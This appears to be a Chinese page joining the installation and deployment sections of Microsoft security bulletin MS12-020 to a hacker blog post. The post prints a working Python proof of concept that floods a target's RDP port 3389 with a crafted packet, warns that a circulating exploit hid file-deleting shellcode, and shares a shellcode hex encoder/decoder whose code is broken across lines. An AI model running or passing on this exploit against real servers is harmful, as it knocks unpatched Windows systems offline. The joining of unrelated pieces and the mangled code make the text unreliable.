/help | 显示命令行选项。 |
安装模式 | |
/passive | 无人参与安装模式。无需用户交互操作,但会显示安装状态。如果安装结束时需要重新启动,将显示一个带有计时器的对话框,警告计算机将在 30 秒后重新启动。 |
/quiet | 安静模式。这与无人参与模式相同,但是不显示任何状态或错误消息。 |
重新启动选项 | |
/norestart | 安装完成后不重新启动。 |
/forcerestart | 安装后重新启动计算机,且在关机时强制其他应用程序关闭而不先保存打开的文件。 |
/warnrestart[:x] | 显示一个带有计时器的对话框,警告计算机将在 x 秒后重新启动。(默认设置为 30 秒。) 与 /quiet 开关或 /passive 开关一起使用。 |
/promptrestart | 显示提示本地用户允许重新启动的对话框。 |
特殊选项 | |
/overwriteoem | 不经提示而覆盖 OEM 文件。 |
/nobackup | 不备份卸载所需的文件。 |
/forceappsclose | 在计算机关机时强制关闭其他程序。 |
/log:path | 允许重定向安装日志文件。 |
/integrate:path | 将更新集成到 Windows 源文件中。这些文件位于开关中指定的路径中。 |
/extract[:path] | 提取文件而不启动安装程序。 |
/ER | 启用扩展错误报告功能。 |
/verbose | 启用详细日志记录。在安装期间,创建 %Windir%\CabBuild.log。此日志详述了被复制的文件。使用此开关可能导致安装过程变慢。 |
注意 可以将这些开关组合到一个命令中。为了保持向后兼容,此安全更新还支持以前版本的安装程序所使用的许多安装开关。有关受支持的安装开关的详细信息,请参阅 Microsoft 知识库文章 262841。
删除更新
此安全更新支持以下安装开关。
开关 | 描述 |
---|---|
/help | 显示命令行选项。 |
安装模式 | |
/passive | 无人参与安装模式。无需用户交互操作,但会显示安装状态。如果安装结束时需要重新启动,将显示一个带有计时器的对话框,警告计算机将在 30 秒后重新启动。 |
/quiet | 安静模式。这与无人参与模式相同,但是不显示任何状态或错误消息。 |
重新启动选项 | |
/norestart | 安装完成后不重新启动。 |
/forcerestart | 安装后重新启动计算机,且在关机时强制其他应用程序关闭而不先保存打开的文件。 |
/warnrestart[:x] | 显示一个带有计时器的对话框,警告计算机将在 x 秒后重新启动。(默认设置为 30 秒。) 与 /quiet 开关或 /passive 开关一起使用。 |
/promptrestart | 显示提示本地用户允许重新启动的对话框。 |
特殊选项 | |
/forceappsclose | 在计算机关机时强制关闭其他程序。 |
/log:path | 允许重定向安装日志文件。 |
验证是否已应用更新
要验证受影响的系统上是否应用了安全更新,可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。有关详细信息,请参阅本公告前面的“检测和部署工具及指导”一节。
由于 Microsoft Windows 有多个版本,因此以下步骤可能会与您的系统上的步骤不同。如果不同,请参阅产品文档来完成这些步骤。
您也可以通过查看本节“参考表”中列出的注册表项来验证此安全更新安装的文件。
这些注册表项可能不包含已安装文件的完整列表。另外,如果管理员或 OEM 将此安全更新集成或组合到 Windows 安装源文件中,则可能无法正确创建这些注册表项。
参考表
下表包含此软件的安全更新信息。您可以在本节的“部署信息”小节中找到更多信息。
包括在 以后的 Service Pack 中 | 此问题的更新程序将包含在以后的 Service Pack 或更新汇总中 |
部署 | |
没有用户干预的安装 | 对于 Windows Vista 所有受支持的 32 位版本: Windows6.0-KB2621440-x86.msu /quiet |
对于 Windows Vista 所有受支持的基于 x64 的版本: Windows6.0-KB2621440-x64.msu /quiet |
|
安装而不重新启动 | 对于 Windows Vista 所有受支持的 32 位版本: Windows6.0-KB2621440-x86.msu /quiet /norestart |
对于 Windows Vista 所有受支持的基于 x64 的版本: Windows6.0-KB2621440-x64.msu /quiet /norestart |
|
更多信息 | 请参阅“检测和部署工具及指导”小节 |
重新启动要求 | |
要求重新启动? | 是,应用此安全更新后必须重新启动系统。 |
HotPatching | 不适用。 |
删除信息 | WUSA.exe 不支持卸载更新。要卸载由 WUSA 安装的更新,请单击“控制面板”,然后单击“安全”。在“Windows Update”下,单击“查看安装的更新”并从更新列表中选择。 |
文件信息 | 请参阅 Microsoft 知识库文章 2621440 |
注册表项验证 | 注 没有用于验证此更新是否存在的注册表项。 |
安装更新
有关此公告中出现的术语详细信息(如修补程序),请参阅 Microsoft 知识库文章 824684。
此安全更新支持以下安装开关。
开关 | 描述 |
---|---|
/?、/h、 /help | 在支持的开关上显示帮助。 |
/quiet | 抑制显示状态或者错误消息。 |
/norestart | 当与 /quiet 结合使用时,系统在安装之后不会重新启动,即使要求重新启动才能完成安装也是如此。 |
注意 有关 wusa.exe 安装程序的详细信息,请参阅 Microsoft 知识库文章 934307。
验证是否已应用更新
要验证受影响的系统上是否应用了安全更新,可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。有关详细信息,请参阅本公告前面的“检测和部署工具及指导”一节。
由于 Microsoft Windows 有多个版本,因此以下步骤可能会与您的系统上的步骤不同。如果不同,请参阅产品文档来完成这些步骤。
参考表
下表包含此软件的安全更新信息。您可以在本节的“部署信息”小节中找到更多信息。
包括在以后的 Service Pack 中 | 此问题的更新程序将包含在以后的 Service Pack 或更新汇总中 |
部署 | |
没有用户干预的安装 | 对于 Windows Server 2008 所有受支持的 32 位版本: Windows6.0-KB2621440-x86.msu /quiet |
对于 Windows Server 2008 所有受支持的基于 x64 的版本: Windows6.0-KB2621440-x64.msu /quiet |
|
对于 Windows Server 2008 所有受支持的基于 Itanium 的版本: Windows6.0-KB2621440-ia64.msu /quiet |
|
安装而不重新启动 | 对于 Windows Server 2008 所有受支持的 32 位版本: Windows6.0-KB2621440-x86.msu /quiet /norestart |
对于 Windows Server 2008 所有受支持的基于 x64 的版本: Windows6.0-KB2621440-x64.msu /quiet /norestart |
|
对于 Windows Server 2008 所有受支持的基于 Itanium 的版本: Windows6.0-KB2621440-ia64.msu /quiet /norestart |
|
更多信息 | 请参阅“检测和部署工具及指导”小节 |
重新启动要求 | |
要求重新启动? | 是,应用此安全更新后必须重新启动系统。 |
HotPatching | 不适用。 |
删除信息 | WUSA.exe 不支持卸载更新。要卸载由 WUSA 安装的更新,请单击“控制面板”,然后单击“安全”。在“Windows Update”下,单击“查看安装的更新”并从更新列表中选择。 |
文件信息 | 请参阅 Microsoft 知识库文章 2621440 |
注册表项验证 | 注 没有用于验证此更新是否存在的注册表项。 |
安装更新
有关此公告中出现的术语详细信息(如修补程序),请参阅 Microsoft 知识库文章 824684。
此安全更新支持以下安装开关。
开关 | 描述 |
---|---|
/?、/h、 /help | 在支持的开关上显示帮助。 |
/quiet | 抑制显示状态或者错误消息。 |
/norestart | 当与 /quiet 结合使用时,系统在安装之后不会重新启动,即使要求重新启动才能完成安装也是如此。 |
注意 有关 wusa.exe 安装程序的详细信息,请参阅 Microsoft 知识库文章 934307。
验证是否已应用更新
要验证受影响的系统上是否应用了安全更新,可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。有关详细信息,请参阅本公告前面的“检测和部署工具及指导”一节。
由于 Microsoft Windows 有多个版本,因此以下步骤可能会与您的系统上的步骤不同。如果不同,请参阅产品文档来完成这些步骤。
参考表
下表包含此软件的安全更新信息。您可以在本节的“部署信息”小节中找到更多信息。
包括在以后的 Service Pack 中 | 此问题的更新程序将包含在以后的 Service Pack 或更新汇总中 |
部署 | |
没有用户干预的安装 | 对于 Windows 7 所有受支持的 32 位版本: Windows6.1-KB2621440-x86.msu /quiet Windows6.1-KB2667402-x86.msu /quiet |
对于 Windows 7 所有受支持的基于 x64 的版本: Windows6.1-KB2621440-x64.msu /quiet Windows6.1-KB2667402-x64.msu /quiet |
|
安装而不重新启动 | 对于 Windows 7 所有受支持的 32 位版本: Windows6.1-KB2621440-x86.msu /quiet /norestart Windows6.1-KB2667402-x86.msu /quiet /norestart |
对于 Windows 7 所有受支持的基于 x64 的版本: Windows6.1-KB2621440-x64.msu /quiet /norestart Windows6.1-KB2667402-x64.msu /quiet /norestart |
|
更多信息 | 请参阅“检测和部署工具及指导”小节 |
重新启动要求 | |
要求重新启动? | 是,应用此安全更新后必须重新启动系统。 |
HotPatching | 不适用。 |
删除信息 | 要卸载 WUSA 安装的更新,请使用 /Uninstall 安装开关,或者单击“控制面板”,单击“系统和安全”,然后在 Windows Update 下单击“查看安装的更新”,并从更新列表中进行选择。 |
文件信息 | 请参阅 Microsoft 知识库文章 2621440 和 Microsoft 知识库文章 2667402 |
注册表项验证 | 注 没有用于验证此更新是否存在的注册表项。 |
安装更新
有关此公告中出现的术语详细信息(如修补程序),请参阅 Microsoft 知识库文章 824684。
此安全更新支持以下安装开关。
开关 | 描述 |
---|---|
/?、/h、 /help | 在支持的开关上显示帮助。 |
/quiet | 抑制显示状态或者错误消息。 |
/norestart | 当与 /quiet 结合使用时,系统在安装之后不会重新启动,即使要求重新启动才能完成安装也是如此。 |
/warnrestart:<秒> | 当与 /quiet 结合使用时,在重新启动之前,安装程序将发出警告。 |
/promptrestart | 当与 /quiet 结合使用时,在重新启动之前,安装程序将进行提示。 |
/forcerestart | 当与 /quiet 结合使用时,安装程序将强制关闭应用程序并重新启动。 |
/log:<文件名> | 将日志记录到指定的文件。 |
/extract:<目标> | 将程序包内容提取到目标文件夹。 |
/uninstall /kb:<KB 编号> | 卸载安全更新。 |
注意 有关 wusa.exe 安装程序的详细信息,请参阅 TechNet 文章 Windows 7 中的其他更改中的“Windows Update 独立安装程序”。
验证 是否已应用更新
要验证受影响的系统上是否应用了安全更新,可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。有关详细信息,请参阅本公告前面的“检测和部署工具及指导”一节。
由于 Microsoft Windows 有多个版本,因此以下步骤可能会与您的系统上的步骤不同。如果不同,请参阅产品文档来完成这些步骤。
参考表
下表包含此软件的安全更新信息。您可以在本节的“部署信息”小节中找到更多信息。
包括在以后的 Service Pack 中 | 此问题的更新程序将包含在以后的 Service Pack 或更新汇总中 |
部署 | |
没有用户干预的安装 | 对于 Windows Server 2008 R2 所有受支持的基于 x64 的版本: Windows6.1-KB2621440-x64.msu /quiet Windows6.1-KB2667402-x64.msu /quiet |
对于 Windows Server 2008 R2 所有受支持的基于 Itanium 的版本: Windows6.1-KB2621440-ia64.msu /quiet Windows6.1-KB2667402-ia64.msu /quiet |
|
安装而不重新启动 | 对于 Windows Server 2008 R2 所有受支持的基于 x64 的版本: Windows6.1-KB2621440-x64.msu /quiet /norestart Windows6.1-KB2667402-x64.msu /quiet /norestart |
对于 Windows Server 2008 R2 所有受支持的基于 Itanium 的版本: Windows6.1-KB2621440-ia64.msu /quiet /norestart Windows6.1-KB2667402-ia64.msu /quiet /norestart |
|
更多信息 | 请参阅“检测和部署工具及指导”小节 |
重新启动要求 | |
要求重新启动? | 是,应用此安全更新后必须重新启动系统。 |
HotPatching | 不适用。 |
删除信息 | 要卸载 WUSA 安装的更新,请使用 /Uninstall 安装开关,或者单击“控制面板”,单击“系统和安全”,然后在 Windows Update 下单击“查看安装的更新”,并从更新列表中进行选择。 |
文件信息 | 请参阅 Microsoft 知识库文章 2621440 和 Microsoft 知识库文章 2667402 |
注册表项验证 | 注 没有用于验证此更新是否存在的注册表项。 |
安装更新
有关此公告中出现的术语详细信息(如修补程序),请参阅 Microsoft 知识库文章 824684。
此安全更新支持以下安装开关。
开关 | 描述 |
---|---|
/?、/h、 /help | 在支持的开关上显示帮助。 |
/quiet | 抑制显示状态或者错误消息。 |
/norestart | 当与 /quiet 结合使用时,系统在安装之后不会重新启动,即使要求重新启动才能完成安装也是如此。 |
/warnrestart:<秒> | 当与 /quiet 结合使用时,在重新启动之前,安装程序将发出警告。 |
/promptrestart | 当与 /quiet 结合使用时,在重新启动之前,安装程序将进行提示。 |
/forcerestart | 当与 /quiet 结合使用时,安装程序将强制关闭应用程序并重新启动。 |
/log:<文件名> | 将日志记录到指定的文件。 |
/extract:<目标> | 将程序包内容提取到目标文件夹。 |
/uninstall /kb:<KB 编号> | 卸载安全更新。 |
注意 有关 wusa.exe 安装程序的详细信息,请参阅 TechNet 文章 Windows 7 中的其他更改中的“Windows Update 独立安装程序”。
验证是否已应用更新
要验证受影响的系统上是否应用了安全更新,可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。有关详细信息,请参阅本公告前面的“检测和部署工具及指导”一节。
由于 Microsoft Windows 有多个版本,因此以下步骤可能会与您的系统上的步骤不同。如果不同,请参阅产品文档来完成这些步骤。
Microsoft 感谢下列人员或组织与我们一起致力于保护客户的利益:
Microsoft 知识库中的信息“按原样”提供,没有任何形式的担保。Microsoft 不作任何明示或暗示保证,包括对适销性和针对特定目的的适用性的保证。Microsoft Corporation 或其供应商不对任何损害(包括直接的、间接的、偶然的、必然的损害,商业利润损失,或特殊损害)承担任何责任,即使 Microsoft Corporation 或其供应商事先已被告知有可能发生此类损害。有些州不允许排除或限制必然或偶然损害的赔偿责任,因此上述限制可能不适用。
Top of section再看看某黑客群里面网友发布的抓图吧!
exp/proc: 保存为ms12-020.py然后运行
#!/usr/bin/env python
import socket
import sys
buf=""
buf+="\x03\x00\x00\x13\x0e\xe0\x00\x00"
buf+="\x00\x00\x00\x01\x00\x08\x00\x00"
buf+="\x00\x00\x00\x03\x00\x01\xd6\x02"
buf+="\xf0\x80\x7f\x65\x82\x01\x94\x04"
buf+="\x01\x01\x04\x01\x01\x01\x01\xff"
buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
buf+="\x00\x00\x00\x00\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
buf+="\x30\x19\x02\x04\x00\x00\x00\x01"
buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\x04\x20\x02\x04\x00\x00\x00\x02"
buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"
buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"
buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"
buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
buf+="\xc0\x03\x00\x00\x0c\x02\xf0\x80"
buf+="\x04\x01\x00\x01\x00\x03\x00\x00"
buf+="\x08\x02\xf0\x80\x28\x03\x00\x00"
buf+="\x0c\x02\xf0\x80\x38\x00\x06\x03"
buf+="\xef\x03\x00\x00\x0c\x02\xf0\x80"
buf+="\x38\x00\x06\x03\xeb\x03\x00\x00"
buf+="\x0c\x02\xf0\x80\x38\x00\x06\x03"
buf+="\xec\x03\x00\x00\x0c\x02\xf0\x80"
buf+="\x38\x00\x06\x03\xed\x03\x00\x00"
buf+="\x0c\x02\xf0\x80\x38\x00\x06\x03"
buf+="\xee\x03\x00\x00\x0b\x06\xd0\x00"
buf+="\x00\x12\x34\x00"
HOST = sys.argv[1]
PORT = 3389
for i in range(1000):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
print "sending: %d bytes" % len(buf)
s.send(buf)
rec = s.recv(100)
print "received: %d bytes" % len(rec)
s.close()
上周,在微博上看到神刀大牛转发了ms12-020的exp,我看了代码,大部分跟poc没啥区别,多了段shellcode,我也懒得解密,就测试了,没想到悲剧了,操蛋,系统坏了,一开始以为是别的什么软件所谓,后来用手机看微博,才了解是这个exp里面带有恶意代码,这个exp整个就是个恶意工具,我把这个exp的shellcode代码解密了,可以看到删除系统文件的代码,linux和windows通杀,靠!
所以大家注意了,我自己也小心了,以后用人家的shellcode,必须解密之后看看代码,奶奶的,害我重装了一次系统,在这里,发个python写的shellcode代码加密解密工具,这样大家能看到对方加密之后的代码了,至于那个恶意的ms12-020的exp代码我就不贴了,免得有些人粗心大意,导致格盘
#!/usr/bin/python
'''
This is ascii <-> shellcode encode / decoder tool
programmer : gunslinger_ <yudha.gunslinger[at]gmail.com>
This was written for educational purpose only. or fucking messing around...
i.e how to use encode mode :
--------------------------------------------------------------
gunslinger@localhost:~/shellcode$ ./shellcodeencdec.py
shellcode hex encode decoder
programmer : gunslinger_
what do you want to do ? encode / decode
=> encode
Please input data : /bin
shellcode => \x2f\x62\x69\x6e
gunslinger@localhost:~/shellcode$
--------------------------------------------------------------
i.e how to use decode mode :
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
we know 'x68' is push, so drop it...
"\x2f\x2f\x73\x68" $0x68732f2f
"\x2f\x62\x69\x6e" $0x6e69622f
--------------------------------------------------------------
gunslinger@localhost:~/shellcode$ ./shellcodeencdec.py
shellcode hex encode decoder
programmer : gunslinger_
what do you want to do ? encode / decode
=> decode
Please input data : \x2f\x2f\x73\x68
hex => 2f2f7368
plaintext => //sh
gunslinger@localhost:~/shellcode$ ./shellcodeencdec.py
shellcode hex encode decoder
programmer : gunslinger_
what do you want to do ? encode / decode
=> decode
Please input data : \x2f\x62\x69\x6e
hex => 2f62696e
plaintext => /bin
gunslinger@localhost:~/shellcode$
--------------------------------------------------------------
and we got that is "/bin//sh"
warning ! this is not disassemble tool !
'''
import
binascii, sys, time
RED
=
'\033[31m'
WHITE
=
'\033[37m'
RESET
=
'\033[0;0m'
def
main():
print
"shellcode hex encode decoder"
print
"programmer : gunslinger_ <yudha.gunslinger[at]gmail.com>"
print
"what do you want to do ? %sencode%s / %sdecode%s"
%
(RED, RESET, WHITE, RESET)
q
=
raw_input
(
"=> "
)
if
q
=
=
"encode"
:
inputtype
=
raw_input
(
"Please input data : "
)
print
"shellcode => "
,
for
encoded
in
inputtype:
print
"\b\\x"
+
encoded.encode(
"hex"
),
sys.stdout.flush()
time.sleep(
0.5
)
print
RESET
elif
q
=
=
"decode"
:
inputtype
=
raw_input
(
"Please input data : "
)
cleaninput
=
inputtype.replace(
"\\x"
,"")
print
"hex => "
,cleaninput
print
"plaintext => "
,
print
"\b"
+
cleaninput.decode(
"hex"
)
else
:
print
"wrong answer ! your choice is %sencode%s or %sdecode%s"
%
(RED, RESET, WHITE, RESET)
sys.exit(
1
)
if
__name__
=
=
'__main__'
:
main()